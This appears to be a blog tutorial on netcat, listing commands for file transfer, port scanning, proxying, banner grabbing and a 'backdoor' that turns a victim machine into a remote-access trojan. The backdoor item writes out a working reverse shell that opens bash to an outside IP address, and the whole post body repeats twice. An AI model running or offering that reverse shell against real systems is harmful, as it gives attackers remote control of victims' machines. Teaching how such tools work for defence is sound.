In order to protect yourself against attacks that are performed by
netcat, one have to understand how it works. Learning about how netcat
attack is carried out can be helpful to help you protect yourself from
attacks that are performed by netcat.
Netcat is a small utility that is able to read and write data across
TCP and UDP network connections. This tool can be used for many cool
things, such as backdoor, port scanner, port listener, port redirector,
transferring files, grabbing banners and more. Netcat is often referred
to as the Swiss army knife, of course for good reason just like the
multifunction usefulness of the vulnerable Swiss army pocket knife.
Well it remind me of summer of 2009, when i came to known about this utility and you seriously wont believe that today i have more then 30 nc commands on my script folder and i use them very frequently , i have discovered different ways to use this utility and they are unique you can also do that . From banner grabbing to RAT,numerous possiblities are their just think yours and post below as comment .
By default, netcat creates a TCP socket either in listening mode (server socket) or a socket that is used in order to connect to a server (client mode). Actually, netcat does not care whether the socket is meant to be a server or a client. All it does is to take the data from stdin and transfer it to the other end across the network.
The simplest example of its usage is to create a server-client chat system. Although this is a very primitive way to chat, it shows how netcat works.
so now its time to try some examples. In examples i ll mostly using my local server Eva.localhost but you can use what ever you want in place of that:
1:Opening a raw connection to a port
nc eva.localhost 22
2:Transfering Files
it can be used to transfer files between two computers. You can create a server that serves the file with the following:
cat vishal.jpg | nc -l 4444
Receive vishal.jpg on the client machine with the following:
nc 192.168.0.1 4444 >vishal.jpg
3:Transporting Partition Image
dd if=/dev/hda3 | gzip -9 | nc -l 4444
On the remote machine, connect to the server and receive the partition image with the following command:
nc 192.168.0.1 4444 | pv -b > partition.img.gz
4:Telnet-like Usage
Netcat can be used in order to talk to servers like telnet does. For example, in order to get the definition of the word “server” from the “WordNet” database at the dict.org dictionary server, I’d do:
nc dict.org 2628
5: Setting up a webserver
{ echo -ne "HTTP/1.0 200 OK\r\n\r\n"; cat coconut; } | nc -l -p 8087
6:Port Scanning
nc -z 192.168.0.1 20-80
whenever this z flag is set then nc do not initiate a connection on a port it just check for open ports.
7:Proxy
nc -l 8084 | nc Eva.localhost 80
So what is going to happen is that my nc server running on 8084 will be transfer all connection to Eva.localhost sever at port number 80.
Now all request will be sent but problem is that how we are going to recieve a reply from Eva.localhost.So for that purpose we will use backpipe
nc -l 8084 0<backpipe | nc Eva.localhost 80 1>backpipe
8:Port Forwarding
nc -l -p 80 -c ' nc -l -p 8080'
9:Banner Grabbing
nc -v Eva.localhost
Finally I got information that the server is running Apache2.2.22(ubuntu)
Now i can search for vulnerabilities if their are any with this specific version.
10: Backdoor(Convert nc to a trojan horse or RAT to exploit a system)
Machine A(hacker): nc -l -n -vv -p 8083
Machine B(Victim Running our Trojan):/bin/bash -i > /dev/tcp/173.214.173.151/8083 0<&1 2>&1
11:Chat
server:nc -v -l -p 54656
Client:nc -v Eva.localhost 54656
Well it remind me of summer of 2009, when i came to known about this utility and you seriously wont believe that today i have more then 30 nc commands on my script folder and i use them very frequently , i have discovered different ways to use this utility and they are unique you can also do that . From banner grabbing to RAT,numerous possiblities are their just think yours and post below as comment .
By default, netcat creates a TCP socket either in listening mode (server socket) or a socket that is used in order to connect to a server (client mode). Actually, netcat does not care whether the socket is meant to be a server or a client. All it does is to take the data from stdin and transfer it to the other end across the network.
The simplest example of its usage is to create a server-client chat system. Although this is a very primitive way to chat, it shows how netcat works.
so now its time to try some examples. In examples i ll mostly using my local server Eva.localhost but you can use what ever you want in place of that:
1:Opening a raw connection to a port
nc eva.localhost 22
2:Transfering Files
it can be used to transfer files between two computers. You can create a server that serves the file with the following:
cat vishal.jpg | nc -l 4444
Receive vishal.jpg on the client machine with the following:
nc 192.168.0.1 4444 >vishal.jpg
3:Transporting Partition Image
dd if=/dev/hda3 | gzip -9 | nc -l 4444
On the remote machine, connect to the server and receive the partition image with the following command:
nc 192.168.0.1 4444 | pv -b > partition.img.gz
4:Telnet-like Usage
Netcat can be used in order to talk to servers like telnet does. For example, in order to get the definition of the word “server” from the “WordNet” database at the dict.org dictionary server, I’d do:
nc dict.org 2628
5: Setting up a webserver
{ echo -ne "HTTP/1.0 200 OK\r\n\r\n"; cat coconut; } | nc -l -p 8087
6:Port Scanning
nc -z 192.168.0.1 20-80
whenever this z flag is set then nc do not initiate a connection on a port it just check for open ports.
7:Proxy
nc -l 8084 | nc Eva.localhost 80
So what is going to happen is that my nc server running on 8084 will be transfer all connection to Eva.localhost sever at port number 80.
Now all request will be sent but problem is that how we are going to recieve a reply from Eva.localhost.So for that purpose we will use backpipe
nc -l 8084 0<backpipe | nc Eva.localhost 80 1>backpipe
8:Port Forwarding
nc -l -p 80 -c ' nc -l -p 8080'
9:Banner Grabbing
nc -v Eva.localhost
Finally I got information that the server is running Apache2.2.22(ubuntu)
Now i can search for vulnerabilities if their are any with this specific version.
10: Backdoor(Convert nc to a trojan horse or RAT to exploit a system)
Machine A(hacker): nc -l -n -vv -p 8083
Machine B(Victim Running our Trojan):/bin/bash -i > /dev/tcp/173.214.173.151/8083 0<&1 2>&1
11:Chat
server:nc -v -l -p 54656
Client:nc -v Eva.localhost 54656
No comments:
Post a Comment